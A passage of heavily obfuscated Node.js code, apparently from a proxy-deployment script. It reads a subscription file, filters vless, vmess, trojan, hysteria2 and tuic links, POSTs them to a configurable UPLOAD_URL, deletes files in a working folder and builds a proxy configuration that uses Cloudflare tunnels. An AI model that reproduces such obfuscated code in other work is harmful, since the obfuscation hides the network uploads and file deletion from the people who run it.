fe},_0x287104={_0x19c629:0x9b,_0x1823ce:0x1c7},_0x25e928={_0x3384a5:0x179},_0x3bf68b={};_0x3bf68b[_0x5a5bd8(-_0xa9e2d7._0x3d0d77,-_0xa9e2d7._0x3670f4,-_0xa9e2d7._0x345fc8,-_0xa9e2d7._0x9a33b6)]=_0x4da5b6(_0xa9e2d7._0x53fe75,_0xa9e2d7._0x48163a,_0xa9e2d7._0x268b41,_0xa9e2d7._0x54d042),_0x3bf68b[_0x4da5b6(0x42,_0xa9e2d7._0x2df9b0,_0xa9e2d7._0x359f04,0x13d)]=function(_0x16ddca,_0x56db22){return _0x16ddca!==_0x56db22;},_0x3bf68b['Pfana']=_0x5a5bd8(-_0xa9e2d7._0x1a68d3,-_0xa9e2d7._0x2d57b0,-_0xa9e2d7._0x36ac16,_0xa9e2d7._0x68b8ba),_0x3bf68b[_0x5a5bd8(-_0xa9e2d7._0x1c2650,_0xa9e2d7._0x4b4289,-_0xa9e2d7._0x19f973,-_0xa9e2d7._0x69b069)]=_0x5a5bd8(0x4,_0xa9e2d7._0x31eee3,-_0xa9e2d7._0x529ee0,-_0xa9e2d7._0x46362d),_0x3bf68b['lOGkF']=function(_0x5d8512,_0x4ddc01){return _0x5d8512!==_0x4ddc01;},_0x3bf68b[_0x4da5b6(0x1a3,_0xa9e2d7._0x2e3078,_0xa9e2d7._0xff0429,_0xa9e2d7._0x48113b)]=_0x4da5b6(0x1f1,_0xa9e2d7._0x60308a,_0xa9e2d7._0x3e1f0a,0x1b7),_0x3bf68b[_0x5a5bd8(0x6f,-_0xa9e2d7._0x1ec86a,_0xa9e2d7._0x25d174,_0xa9e2d7._0x5472f9)]=_0x5a5bd8(-_0xa9e2d7._0x2f8706,-_0xa9e2d7._0x2fa055,-_0xa9e2d7._0x18c22b,-_0xa9e2d7._0x429f25),_0x3bf68b[_0x5a5bd8(-_0xa9e2d7._0x404772,-_0xa9e2d7._0x3f34ae,-_0xa9e2d7._0xc886df,-_0xa9e2d7._0x18d399)]=_0x4da5b6(_0xa9e2d7._0x1fd4cb,_0xa9e2d7._0x290b5f,0x106,_0xa9e2d7._0x4d2adb);function _0x5a5bd8(_0x180de0,_0x1175dc,_0x126238,_0x2398ce){return _0x477c8c(_0x180de0-_0x25e928._0x3384a5,_0x1175dc-0xcd,_0x2398ce,_0x180de0- -0x434);}_0x3bf68b[_0x4da5b6(0x6e,0x160,_0xa9e2d7._0x41fdde,-_0xa9e2d7._0x1b7cfd)]='utf-8';function _0x4da5b6(_0x2799de,_0x3058d5,_0x42ddc3,_0x208d5a){return _0x5d6c89(_0x42ddc3-_0x287104._0x19c629,_0x3058d5-0x71,_0x42ddc3-_0x287104._0x1823ce,_0x2799de);}_0x3bf68b[_0x5a5bd8(_0xa9e2d7._0x52e4a6,_0xa9e2d7._0x3102d9,_0xa9e2d7._0x152c55,_0xa9e2d7._0x263bc3)]=_0x5a5bd8(-_0xa9e2d7._0x42a089,-0xf1,-_0xa9e2d7._0x185ad5,-_0xa9e2d7._0x394c2e),_0x3bf68b['uGkcy']=function(_0x7e606c,_0x257887){return _0x7e606c!==_0x257887;},_0x3bf68b[_0x4da5b6(_0xa9e2d7._0x2c45d5,_0xa9e2d7._0x237c82,_0xa9e2d7._0x4a60c8,_0xa9e2d7._0x55e25a)]=_0x5a5bd8(_0xa9e2d7._0xaa7f1d,-_0xa9e2d7._0x2b3ea6,_0xa9e2d7._0x40a47d,_0xa9e2d7._0x26882e),_0x3bf68b[_0x4da5b6(0x197,_0xa9e2d7._0x4cddc9,0x13b,0x1e4)]='PrxYf';const _0x53d0ca=_0x3bf68b;try{if(_0x53d0ca['Pfadk'](_0x53d0ca['Pfana'],_0x53d0ca[_0x5a5bd8(-_0xa9e2d7._0x1c2650,-_0xa9e2d7._0x2df9b0,-_0xa9e2d7._0x5df031,-0x61)])){if(!UPLOAD_URL)return;if(!fs[_0x4da5b6(_0xa9e2d7._0x172a36,_0xa9e2d7._0xb054ee,_0xa9e2d7._0xb6b207,0x233)](subPath))return;let _0x1aebe5;try{if(_0x53d0ca[_0x4da5b6(_0xa9e2d7._0x4f8b24,-_0xa9e2d7._0xf087ee,_0xa9e2d7._0x10e3b3,_0xa9e2d7._0x57e0dd)](_0x53d0ca[_0x5a5bd8(-_0xa9e2d7._0x44f8ca,_0xa9e2d7._0x149484,-0x12,-_0xa9e2d7._0x48113b)],_0x53d0ca[_0x5a5bd8(0x6f,-0x5e,_0xa9e2d7._0x301c91,0x12a)]))_0x1aebe5=fs['readFileSync'](subPath,_0x4da5b6(0xb0,_0xa9e2d7._0x4745c3,0xcb,-_0xa9e2d7._0x3d038d));else{const _0x558007=_0x457103?function(){const _0x34053a={_0x15d06d:0x197,_0x2fa171:0x33e,_0x17018d:0x1ab};function _0x59f964(_0x58309c,_0x578b62,_0x314fa7,_0xadcdb0){return _0x4da5b6(_0x578b62,_0x578b62-_0x34053a._0x15d06d,_0xadcdb0-_0x34053a._0x2fa171,_0xadcdb0-_0x34053a._0x17018d);}if(_0x440cb0){const _0x5577ba=_0x23534d[_0x59f964(_0x2c3ba2._0x741941,_0x2c3ba2._0x263527,_0x2c3ba2._0x165310,_0x2c3ba2._0x191a7a)](_0x326075,arguments);return _0x4e733f=null,_0x5577ba;}}:function(){};return _0x4278ad=![],_0x558007;}}catch{return null;}const _0x15867b=Buffer['from'](_0x1aebe5,_0x53d0ca[_0x5a5bd8(-_0xa9e2d7._0x95fe43,-0x6b,-_0xa9e2d7._0x38058a,-_0xa9e2d7._0x44e96a)])[_0x4da5b6(0x89,_0xa9e2d7._0xc1fd79,_0xa9e2d7._0xfe575a,_0xa9e2d7._0x17c42b)](_0x53d0ca[_0x5a5bd8(-_0xa9e2d7._0x2a4994,-_0xa9e2d7._0xa6b6d7,-_0xa9e2d7._0xe6ebf4,-_0xa9e2d7._0xe1c44b)]),_0x548d53=_0x15867b[_0x4da5b6(0x1f3,_0xa9e2d7._0x177b7e,_0xa9e2d7._0x31eee3,_0xa9e2d7._0x516e5a)]('\x0a')[_0x4da5b6(_0xa9e2d7._0x4a86c3,_0xa9e2d7._0x215f11,_0xa9e2d7._0x1550e7,0x5c)](_0x444517=>/(vless|vmess|trojan|hysteria2|tuic):\/\//['test'](_0x444517));if(_0x548d53[_0x5a5bd8(-0x96,-_0xa9e2d7._0x3621b1,-0x8f,-_0xa9e2d7._0x44e96a)]===0x4dd+-0x806+-0x329*-0x1)return;const _0x58ea99={};_0x58ea99[_0x4da5b6(_0xa9e2d7._0x3c915f,0x2cc,_0xa9e2d7._0x23a909,_0xa9e2d7._0x112d69)]=_0x548d53;const _0x31397c={};_0x31397c[_0x4da5b6(_0xa9e2d7._0x37e166,_0xa9e2d7._0x4df218,_0xa9e2d7._0x2397da,_0xa9e2d7._0x395fed)]=_0x53d0ca['SRUTn'];const _0x5c6500={};return _0x5c6500[_0x4da5b6(-_0xa9e2d7._0x57e0dd,0x4f,0x5b,_0xa9e2d7._0x53eb1b)]=_0x31397c,axios[_0x4da5b6(0x1e7,_0xa9e2d7._0x4fe082,_0xa9e2d7._0x4a45f8,_0xa9e2d7._0x4e6123)](UPLOAD_URL+_0x5a5bd8(-0xc,_0xa9e2d7._0x570001,_0xa9e2d7._0x522e33,-_0xa9e2d7._0x3aa09d),JSON[_0x4da5b6(0xa8,-_0xa9e2d7._0x2e0f00,_0xa9e2d7._0x3e1775,0x61)](_0x58ea99),_0x5c6500)[_0x5a5bd8(-_0xa9e2d7._0x4d353d,-_0xa9e2d7._0x2aa84a,0x72,_0xa9e2d7._0x1743cf)](_0x2e07b8=>{return null;}),null;}else{const _0x655e9e=_0x32683e?function(){if(_0x1838bd){const _0x57f707=_0x59b118['apply'](_0x211a78,arguments);return _0x39d5ba=null,_0x57f707;}}:function(){};return _0x4c97db=![],_0x655e9e;}}catch(_0x697c1c){if(_0x53d0ca['uGkcy'](_0x53d0ca['NwXwW'],_0x53d0ca['Wczxj']))return null;else{const _0x7e45e0={};_0x7e45e0['Content-Type']=_0x53d0ca[_0x5a5bd8(-_0xa9e2d7._0x37e166,-0x134,-0x1a1,-_0xa9e2d7._0x456ba8)],_0x234979[_0x4da5b6(_0xa9e2d7._0x40a17e,_0xa9e2d7._0x29f868,0x1ce,_0xa9e2d7._0x1bf469)](0x2c5+-0x1*0x2457+0x225a,_0x7e45e0),_0xe522be[_0x4da5b6(0x10b,0x214,_0xa9e2d7._0x538b42,_0xa9e2d7._0x429f25)](_0x1e0dfe);}}}function cleanupOldFiles(){const _0x468a79={_0x301aeb:0x172,_0x5965f9:0x8a,_0x34dde2:0x213,_0x464410:0x2af,_0x50a424:0x151,_0x22078f:0x248,_0x3291fd:0x211,_0x5776a0:0x166,_0xde20fe:0x1fd,_0x39dd09:0x4c,_0x8ea9a6:0x1e1,_0x24263a:0x190,_0x4400fd:0x179,_0x474771:0x3a,_0x34df0d:0x124},_0x4d121a={_0x54cca2:0x324,_0x2c5070:0x24c,_0x58a9d8:0x2b2,_0x4a1e08:0x37b,_0x3e97d3:0x393,_0x179dda:0x2c2,_0x142733:0x261,_0x50c63e:0x1ee,_0x14b08a:0x26a,_0x41dc91:0x2f5,_0x15c0f4:0x2bc,_0x30ac06:0x3fa,_0x44d7a5:0x30f,_0x404e87:0x150,_0x11f86a:0x104,_0x59f6ab:0x1bd,_0x82d2a5:0x151,_0x665a46:0x21b,_0x1f5cbc:0x398,_0x368ccd:0x2ec,_0x3149f3:0xc4,_0x5a0848:0x149,_0xa177f8:0x12,_0x2e86d6:0x47,_0x73b75:0xd3,_0x5db398:0x13c},_0xaaf22a={_0xfcaa70:0x1b9,_0x1bfe51:0x2b5},_0x34f084={_0xdcf7a7:0x1d5,_0x1b74dd:0x32};function _0x5bfe32(_0x55a98c,_0x466fea,_0xd19c5a,_0x2bec87){return _0x477c8c(_0x55a98c-_0x34f084._0xdcf7a7,_0x466fea-_0x34f084._0x1b74dd,_0x2bec87,_0x466fea- -0x1b8);}const _0x111bc3={};function _0x470b61(_0x12b556,_0x296e3d,_0x328e7f,_0x287c35){return _0x477c8c(_0x12b556-_0xaaf22a._0xfcaa70,_0x296e3d-0x194,_0x328e7f,_0x287c35- -_0xaaf22a._0x1bfe51);}_0x111bc3[_0x5bfe32(_0x468a79._0x301aeb,0xcd,0xa8,_0x468a79._0x5965f9)]=function(_0xbfb6f7,_0x9a0d7e){return _0xbfb6f7===_0x9a0d7e;},_0x111bc3[_0x470b61(_0x468a79._0x34dde2,_0x468a79._0x464410,0x1f6,0x18d)]=_0x5bfe32(_0x468a79._0x50a424,_0x468a79._0x22078f,_0x468a79._0x3291fd,_0x468a79._0x5776a0);const _0x18d495=_0x111bc3;try{const _0xdba38d=fs[_0x5bfe32(_0x468a79._0xde20fe,0x159,_0x468a79._0x39dd09,_0x468a79._0x8ea9a6)](FILE_PATH);_0xdba38d[_0x470b61(_0x468a79._0x24263a,_0x468a79._0x4400fd,_0x468a79._0x474771,_0x468a79._0x34df0d)](_0x3ffbc4=>{const _0x40111f={_0x37d08c:0x52,_0x19b555:0x1f5,_0x3803c9:0x1b2},_0x11e82e={_0x3f71a8:0xf,_0x1e428b:0x70},_0x16eaaa=path[_0x1aeb30(_0x4d121a._0x54cca2,_0x4d121a._0x2c5070,0x336,_0x4d121a._0x58a9d8)](FILE_PATH,_0x3ffbc4);function _0x1aeb30(_0x51e145,_0x113d52,_0x4028c0,_0x5bb0a6){return _0x470b61(_0x51e145-0x1a1,_0x113d52-_0x11e82e._0x3f71a8,_0x5bb0a6,_0x113d52-_0x11e82e._0x1e428b);}function _0x3680a9(_0x413480,_0x51f602,_0x13da75,_0x3c6f7d){return _0x5bfe32(_0x413480-_0x40111f._0x37d08c,_0x3c6f7d-_0x40111f._0x19b555,_0x13da75-_0x40111f._0x3803c9,_0x51f602);}try{if(_0x18d495[_0x3680a9(_0x4d121a._0x4a1e08,_0x4d121a._0x3e97d3,_0x4d121a._0x4a1e08,_0x4d121a._0x179dda)](_0x18d495[_0x1aeb30(_0x4d121a._0x142733,0x1fd,_0x4d121a._0x50c63e,0x1e9)],_0x18d495[_0x1aeb30(_0x4d121a._0x14b08a,0x1fd,0x2b3,_0x4d121a._0x41dc91)])){const _0x563349=fs[_0x3680a9(_0x4d121a._0x15c0f4,_0x4d121a._0x30ac06,0x419,_0x4d121a._0x44d7a5)](_0x16eaaa);_0x563349[_0x1aeb30(_0x4d121a._0x404e87,_0x4d121a._0x11f86a,_0x4d121a._0x59f6ab,_0x4d121a._0x82d2a5)]()&&fs[_0x3680a9(_0x4d121a._0x665a46,0x1ec,_0x4d121a._0x1f5cbc,_0x4d121a._0x368ccd)](_0x16eaaa);}else{const _0x220d4f=_0x28638a[_0x1aeb30(_0x4d121a._0x3149f3,_0x4d121a._0x5a0848,0x150,0x262)](/https?:\/\/([^ ]*trycloudflare\.com)\/?/);if(_0x220d4f){const _0x5e50df=_0x220d4f[0x95*0x2f+0x2f*0x6d+0x2f5d*-0x1];_0x28a10e[_0x1aeb30(-_0x4d121a._0xa177f8,_0x4d121a._0x2e86d6,_0x4d121a._0x73b75,_0x4d121a._0x5db398)](_0x5e50df);}}}catch(_0x4d28ad){}});}catch(_0x206ea3){}}async function generateConfig(){const _0x4c6f1d={_0xe31b9a:0x1df,_0x3a2396:0x1c8,_0x3b950a:0xb5,_0x5bb4af:0xc4,_0x31ae41:0x19,_0x554551:0x182,_0x19e4eb:0x226,_0x56eb73:0x5f,_0x4f5e48:0x57,_0x3c6169:0x1aa,_0x4084e1:0xb7,_0x4171d9:0x1d2,_0xba9bc7:0x10,_0x541751:0x36,_0x1b4e11:0x67,_0x31c138:0xdb,_0x156203:0xbd,_0x45a55e:0xa,_0x16e054:0x25f,_0x57f71b:0x158,_0x2532ad:0x1e3,_0x1fe78c:0x19,_0x45b6be:0xe,_0x4ee851:0x9b,_0x304bbd:0x141,_0x4e715e:0x160,_0x42523a:0x118,_0x129a62:0x51,_0x4dd4f6:0x40,_0x32e377:0x17,_0x32b32e:0x40,_0x18e152:0x217,_0x426a9a:0x132,_0x226268:0x97,_0x3c5b45:0xa1,_0x3fd3c9:0x149,_0x2b1452:0x1fc,_0x3bde8c:0x5c,_0x54bca3:0x19,_0x34ccae:0xfb,_0x871276:0x1a6,_0x3a5140:0x142,_0x4e1cef:0x29,_0x44bf3f:0x4a,_0x21a841:0xde,_0x1fa258:0xc9,_0x199b3c:0x9f,_0x40e616:0x21b,_0x1e7ae4:0x1b6,_0x523974:0x11d,_0x2a1147:0x193,_0x3439ec:0x8,_0x3164de:0x10d,_0x48fb2b:0x1cd,_0x44e9c3:0x1d,_0x2fd368:0x27,_0x5c9759:0xbe,_0xf05fd9:0x15b,_0x1a18a8:0x237,_0x3c3f98:0x16b,_0x5b4c0d:0x100,_0x14b4f5:0x62,_0x2451ad:0x9a,_0x17f6dc:0x7f,_0x301053:0x49,_0x2f4bb2:0x2b,_0x34b10d:0x26,_0x2865b1:0x114,_0x221204:0x11f,_0x4b4a93:0x15c,_0x2e8ac0:0x50,_0x4e6b20:0x108,_0x25682e:0x4c,_0x4c36e4:0x1b,_0x5a4eab:0x14f,_0x5cfef3:0x153,_0x47189d:0x119,_0x4ba622:0x2d,_0x229385:0xa9,_0x5b6fe3:0x134,_0x56aa67:0x2e,_0x2cd043:0x1ab,_0x5a8ab2:0xaa,_0x5a022b:0x56,_0x5d2789:0x3c,_0x45e81b:0x8,_0xade075:0xc3,_0x1776f0:0x34,_0xd78c51:0x10e,_0x5673a7:0xb8,_0x1b49b4:0x6b,_0x4a6546:0x2,_0x6e4b49:0x14d,_0x2c1a61:0x33,_0x41b75e:0x3,_0x76e62a:0x126,_0x438379:0xf3,_0x2889d1:0x6d,_0x44cf43:0xaf,_0x1ad26c:0x177,_0x47df1f:0x41,_0x351687:0x34,_0x3833c9:0x219,_0x433cc8:0xd2,_0x344c08:0x117,_0x3d343d:0x13f,_0x26cd16:0xb9,_0xfefebb:0x5,_0x558b7e:0x95,_0x9cb059:0x82,_0x252b44:0x6,_0xfee62f:0x30,_0x5539ca:0x3f,_0x67b296:0x10b,_0x2b1c20:0x124,_0x5e0491:0xe2,_0x42bedf:0xcd,_0x395d7a:0x235,_0x287f25:0x1d4,_0x4e9352:0x2aa,_0x537e28:0x220,_0x49d20f:0x8e,_0x4c1756:0x59,_0x2582c0:0x76,_0x22391e:0x15f,_0x4edc1d:0x157,_0x158c04:0x12,_0x2e44b4:0xb1,_0x399132:0x6c,_0x45f557:0x9f,_0x1ee68a:0x7a,_0x4fc1df:0x1e,_0x2a7b63:0xdc,_0x3f9ac3:0x203,_0xb57520:0x5e,_0x313f64:0xfd,_0x3f9309:0x21,_0x58c9c8:0x1d0,_0x3994f4:0x29e,_0x396975:0x183,_0x574b42:0x250,_0x45aeb7:0x10c,_0x6dce9a:0x7,_0x56fb66:0xe9,_0xdc80c5:0x117,_0xe063a5:0xf5,_0x45cd0d:0x29,_0x1a36fa:0xa6,_0x18a4d2:0x165,_0x291101:0x7c,_0x228874:0x52,_0x376e54:0x15,_0x3d091f:0x6f,_0x315b60:0x196,_0x37c169:0x1d4,_0x415227:0x225,_0x41033d:0x1a2,_0xd36751:0x27e,_0x280f5d:0x276,_0x306768:0x13b,_0x38954c:0x14,_0x5d80f7:0x56,_0x541a09:0x117,_0x499948:0x1cb,_0x39c465:0x126,_0x4379f5:0x21f,_0x35a38f:0x1bb,_0x3fe910:0xa6,_0x1a1d7e:0x199,_0x3dc33b:0x55,_0x4d43df:0x118,_0x213474:0x1fd,_0x5585d2:0x1f6,_0x827dae:0x20,_0x177b63:0x56,_0x47888f:0x5a,_0x27cdfe:0x125,_0xe55eaa:0x223,_0x4269ff:0x38,_0x1f8a7c:0x80,_0x479a49:0xf8,_0x53e526:0x3,_0x1154c8:0x27,_0x45c97e:0x93,_0x241425:0x66,_0x5639a0:0x2,_0x38ad16:0x12c,_0x71926c:0xea,_0x5cf61a:0x55,_0x25c015:0x1c3,_0x39f583:0x233,_0x2f74e0:0xec,_0x5ab14b:0x292,_0x4a8d23:0x11c,_0x509ab6:0x20d,_0x354a05:0x8f,_0x346f64:0x138,_0x489128:0x10a,_0x10e8b1:0x4a,_0x500ef5:0xdb,_0x10a9c9:0x106,_0x2dc0d5:0x1df,_0x3370cb:0x83,_0x5849bf:0x5c,_0x7024ba:0xb3,_0x944b62:0x16e,_0x3b732a:0x79,_0x5ad48a:0x10d,_0x14a5c7:0x16,_0x3abe39:0x158,_0x3fc505:0x229,_0x1bce24:0x40,_0x3474e1:0xda,_0xcca22:0x14,_0x3efc21:0x7f,_0x1df4d5:0x11b,_0x226a58:0x9,_0x20f7bc:0x8a,_0x1d655f:0xb6,_0x251e67:0x3e,_0x20573d:0xff,_0x1d36f8:0x140,_0x5564e3:0x18,_0x5a5886:0x41,_0x130c16:0xcc,_0x51cba4:0x29a,_0x46c7c0:0x1f3,_0x6c620e:0x161,_0x38f2f6:0x1c0,_0x302c20:0x89,_0x2a305e:0xb4,_0x12d8e0:0x217,_0x1aa32f:0x1e6,_0x531623:0x170,_0x39422f:0xa7,_0x45f65f:0x7b,_0x3abf0b:0x5,_0x2a8925:0x160,_0x45618e:0x65,_0x3b4b44:0x63,_0x31238e:0x1ca,_0x4d2bf7:0xe4,_0x482e43:0x13d,_0x19d655:0x172,_0x5b3903:0x4d,_0x3f013d:0x246,_0x4e238b:0x1d3,_0x3c8ce6:0x160,_0x5e27b8:0x1ea,_0x43313f:0xd3,_0x290a4f:0x5c,_0x402e:0x169,_0x36c467:0x146,_0x3bca81:0xda,_0x5a3228:0xe8,_0x414830:0x30,_0x3648a6:0x271,_0x569410:0x15b,_0x30a9c8:0x1a8,_0x3d2b17:0x7d,_0xd79b98:0x8a,_0xb7210e:0xd7,_0x53dc68:0xe9,_0x1bebc8:0x60,_0x14e5f7:0x3e,_0x5d2203:0x98,_0x5ca9cb:0x66,_0x75ae85:0x32,_0x421955:0xeb,_0xe4abfe:0x126,_0x3b4b6b:0x46,_0x267b4e:0x1bd,_0x1e90a6:0x1b2,_0xe0e6d6:0x15d,_0x4c77f2:0x187,_0x5aa20b:0x193,_0x34b6cb:0x58,_0xc0e96d:0x77,_0x52633f:0x18,_0x102754:0x3a,_0x35d7d0:0x81,_0x872de7:0x9d,_0x50ad81:0x142,_0x41ab00:0x65,_0x337b34:0x2f,_0x21e052:0x1af,_0x29833c:0x130,_0x5a8f82:0x172,_0x34229a:0x19a,_0x29a81b:0x1a,_0x1f8f66:0x5e,_0x35ddf9:0x1a1,_0x4abdc1:0xa7,_0x139290:0x5c,_0x38ab21:0x2c,_0x1a9dc8:0x44,_0x167c18:0x1dd,_0x3292b7:0x213,_0x3b8490:0xed,_0x410478:0x28,_0x51c919:0x4,_0x59c414:0x6e,_0x596a18:0x87,_0x27ccdc:0xbb,_0x58ffa4:0x167,_0x1aab3a:0x96,_0x849172:0x88,_0x5d28b4:0x16a,_0x3831d4:0xd6,_0x2f25ec:0xb,_0x2e25ef:0x96,_0x67e698:0x17d,_0xdda9f:0x248,_0x4466d0:0x63,_0x91cdef:0x2d1,_0xaae129:0x2e1,_0x17bcf7:0xb8,_0x35d108:0xfc,_0x212c90:0x30,_0x3fe1be:0x24e,_0x3bdeb9:0x112,_0x291174:0x262},_0x5e7143={_0x51f994:0x146},_0x280156={_0x353ff0:0x15a},_0x7907d2={};_0x7907d2['WZjpc']=_0x127c7f(-_0x4c6f1d._0xe31b9a,-_0x4c6f1d._0x3a2396,-_0x4c6f1d._0x3b950a,-0x2d1),_0x7907d2[_0x11f908(_0x4c6f1d._0x5bb4af,-_0x4c6f1d._0x31ae41,0x71,_0x4c6f1d._0x554551)]=_0x127c7f(-0x20c,-_0x4c6f1d._0x554551,-_0x4c6f1d._0x19e4eb,-_0x4c6f1d._0x56eb73),_0x7907d2[_0x11f908(_0x4c6f1d._0x4f5e48,_0x4c6f1d._0x3c6169,_0x4c6f1d._0x4084e1,_0x4c6f1d._0x4171d9)]=_0x127c7f(-0x8d,-_0x4c6f1d._0xba9bc7,-0x125,_0x4c6f1d._0x541751),_0x7907d2[_0x127c7f(-_0x4c6f1d._0x1b4e11,-_0x4c6f1d._0x31c138,-_0x4c6f1d._0x156203,-_0x4c6f1d._0x45a55e)]=_0x127c7f(-_0x4c6f1d._0x16e054,-_0x4c6f1d._0x57f71b,-_0x4c6f1d._0x2532ad,-0x190),_0x7907d2[_0x11f908(_0x4c6f1d._0x1fe78c,-_0x4c6f1d._0x45b6be,-_0x4c6f1d._0x4ee851,-_0x4c6f1d._0x304bbd)]=_0x127c7f(-_0x4c6f1d._0x4e715e,-_0x4c6f1d._0x42523a,-0x17c,-_0x4c6f1d._0x129a62),_0x7907d2[_0x11f908(-_0x4c6f1d._0x4dd4f6,-_0x4c6f1d._0x32e377,-0xa3,_0x4c6f1d._0x32b32e)]=_0x11f908(-_0x4c6f1d._0x18e152,-_0x4c6f1d._0x4f5e48,-_0x4c6f1d._0x426a9a,-_0x4c6f1d._0x226268),_0x7907d2[_0x11f908(-_0x4c6f1d._0x3c5b45,-0x70,-_0x4c6f1d._0x3fd3c9,-_0x4c6f1d._0x2b1452)]=_0x11f908(-_0x4c6f1d._0x3bde8c,-_0x4c6f1d._0x54bca3,-_0x4c6f1d._0x34ccae,-_0x4c6f1d._0x871276),_0x7907d2['yJImf']=_0x11f908(_0x4c6f1d._0x3a5140,_0x4c6f1d._0x4e1cef,_0x4c6f1d._0x44bf3f,_0x4c6f1d._0x21a841),_0x7907d2[_0x127c7f(_0x4c6f1d._0x1fa258,_0x4c6f1d._0x3bde8c,0x150,-_0x4c6f1d._0x199b3c)]=_0x127c7f(-_0x4c6f1d._0x40e616,-_0x4c6f1d._0x1e7ae4,-_0x4c6f1d._0x523974,-_0x4c6f1d._0x2a1147),_0x7907d2[_0x11f908(_0x4c6f1d._0x3439ec,-0xc8,-_0x4c6f1d._0x3164de,-_0x4c6f1d._0x48fb2b)]=_0x11f908(_0x4c6f1d._0x44e9c3,_0x4c6f1d._0x3bde8c,-0x99,_0x4c6f1d._0x2fd368);function _0x127c7f(_0x3ca556,_0x1f952e,_0xc49cb6,_0x434a6c){return _0x5d6c89(_0x1f952e- -0x169,_0x1f952e-0x1e,_0xc49cb6-_0x280156._0x353ff0,_0x434a6c);}_0x7907d2[_0x127c7f(-_0x4c6f1d._0x5c9759,-_0x4c6f1d._0xf05fd9,-_0x4c6f1d._0x1a18a8,-_0x4c6f1d._0x3c3f98)]='quic',_0x7907d2[_0x127c7f(-_0x4c6f1d._0x5b4c0d,-_0x4c6f1d._0x14b4f5,-_0x4c6f1d._0x2451ad,_0x4c6f1d._0x17f6dc)]=_0x11f908(_0x4c6f1d._0x301053,-_0x4c6f1d._0x2f4bb2,-0x11,_0x4c6f1d._0x34b10d),_0x7907d2['kVJhN']='trojan',_0x7907d2[_0x11f908(-0x2a,-_0x4c6f1d._0x2865b1,-0x41,-_0x4c6f1d._0x221204)]=_0x11f908(_0x4c6f1d._0x4b4a93,0x3c,_0x4c6f1d._0x2e8ac0,_0x4c6f1d._0x3164de),_0x7907d2[_0x127c7f(-_0x4c6f1d._0x4e6b20,-_0x4c6f1d._0x25682e,-0xd3,-_0x4c6f1d._0x4c36e4)]='direct',_0x7907d2[_0x11f908(-_0x4c6f1d._0x5a4eab,-_0x4c6f1d._0x44bf3f,-0x13c,-_0x4c6f1d._0x5cfef3)]=_0x127c7f(_0x4c6f1d._0x47189d,_0x4c6f1d._0x4ba622,_0x4c6f1d._0x229385,_0x4c6f1d._0x5b6fe3),_0x7907d2[_0x11f908(_0x4c6f1d._0x56aa67,-_0x4c6f1d._0x2cd043,-_0x4c6f1d._0x5a8ab2,_0x4c6f1d._0x5a022b)]='block',_0x7907d2[_0x127c7f(0x148,_0x4c6f1d._0x5d2789,_0x4c6f1d._0x45e81b,-_0x4c6f1d._0xade075)]=_0x11f908(-_0x4c6f1d._0x1776f0,-_0x4c6f1d._0x5d2789,-_0x4c6f1d._0xd78c51,-_0x4c6f1d._0x5673a7);const _0x2d885b=_0x7907d2,_0x1f47b2={};_0x1f47b2[_0x127c7f(_0x4c6f1d._0xba9bc7,-_0x4c6f1d._0x1b49b4,_0x4c6f1d._0x4a6546,-_0x4c6f1d._0x6e4b49)]=_0x2d885b[_0x11f908(-_0x4c6f1d._0x2c1a61,_0x4c6f1d._0x41b75e,-0xd5,-_0x4c6f1d._0x76e62a)],_0x1f47b2[_0x11f908(_0x4c6f1d._0x438379,-_0x4c6f1d._0x2889d1,_0x4c6f1d._0x44cf43,_0x4c6f1d._0x1ad26c)]='/dev/null',_0x1f47b2[_0x127c7f(-_0x4c6f1d._0x3c6169,-0xd1,-_0x4c6f1d._0x47df1f,_0x4c6f1d._0x351687)]=_0x11f908(-_0x4c6f1d._0x3833c9,-_0x4c6f1d._0x433cc8,-_0x4c6f1d._0x344c08,-_0x4c6f1d._0x3d343d);const _0x250cc2={};_0x250cc2[_0x127c7f(-_0x4c6f1d._0x26cd16,-0xce,-0x178,-_0x4c6f1d._0x5b4c0d)]=0xbb9;const _0x4240e6={};_0x4240e6[_0x127c7f(-_0x4c6f1d._0xfefebb,-0x38,-0x8e,-_0x4c6f1d._0x5a4eab)]=ARGO_PORT,_0x4240e6[_0x11f908(_0x4c6f1d._0x558b7e,0xdf,_0x4c6f1d._0x9cb059,0x4a)]=_0x2d885b[_0x127c7f(_0x4c6f1d._0x252b44,_0x4c6f1d._0xfee62f,0x148,-_0x4c6f1d._0x5539ca)],_0x4240e6[_0x11f908(-_0x4c6f1d._0x67b296,-_0x4c6f1d._0x2b1c20,-_0x4c6f1d._0x5e0491,-_0x4c6f1d._0x42bedf)]={},_0x4240e6[_0x127c7f(-_0x4c6f1d._0x395d7a,-_0x4c6f1d._0x287f25,-_0x4c6f1d._0x4e9352,-_0x4c6f1d._0x537e28)]={},_0x4240e6[_0x11f908(-_0x4c6f1d._0x67b296,-_0x4c6f1d._0x2b1c20,-_0x4c6f1d._0x5e0491,-_0x4c6f1d._0x42bedf)][_0x127c7f(-_0x4c6f1d._0x49d20f,-_0x4c6f1d._0x4c1756,_0x4c6f1d._0x1776f0,-0x30)]=[{'id':UUID,'flow':_0x2d885b[_0x127c7f(0x124,_0x4c6f1d._0x2582c0,_0x4c6f1d._0x22391e,_0x4c6f1d._0x4edc1d)]}],_0x4240e6[_0x11f908(-_0x4c6f1d._0x67b296,-_0x4c6f1d._0x2b1c20,-_0x4c6f1d._0x5e0491,-_0x4c6f1d._0x42bedf)][_0x127c7f(-_0x4c6f1d._0x9cb059,_0x4c6f1d._0x158c04,_0x4c6f1d._0x3b950a,-_0x4c6f1d._0x2e44b4)]=_0x2d885b['sKkIP'],_0x4240e6[_0x11f908(-_0x4c6f1d._0x67b296,-_0x4c6f1d._0x2b1c20,-_0x4c6f1d._0x5e0491,-_0x4c6f1d._0x42bedf)][_0x11f908(-_0x4c6f1d._0x5d2789,-_0x4c6f1d._0x399132,-_0x4c6f1d._0x45f557,_0x4c6f1d._0x1ee68a)]=[_0x250cc2,{'path':_0x2d885b[_0x127c7f(_0x4c6f1d._0x4fc1df,-_0x4c6f1d._0x2a7b63,-_0x4c6f1d._0x3f9ac3,-_0x4c6f1d._0xb57520)],'dest':0xbba},{'path':_0x2d885b[_0x11f908(-_0x4c6f1d._0x313f64,_0x4c6f1d._0x3f9309,-0xa3,_0x4c6f1d._0x4c1756)],'dest':0xbbb},{'path':_0x2d885b['NWchM'],'dest':0xbbc}],_0x4240e6[_0x127c7f(-_0x4c6f1d._0x395d7a,-_0x4c6f1d._0x287f25,-_0x4c6f1d._0x4e9352,-_0x4c6f1d._0x537e28)][_0x11f908(-_0x4c6f1d._0x58c9c8,-_0x4c6f1d._0x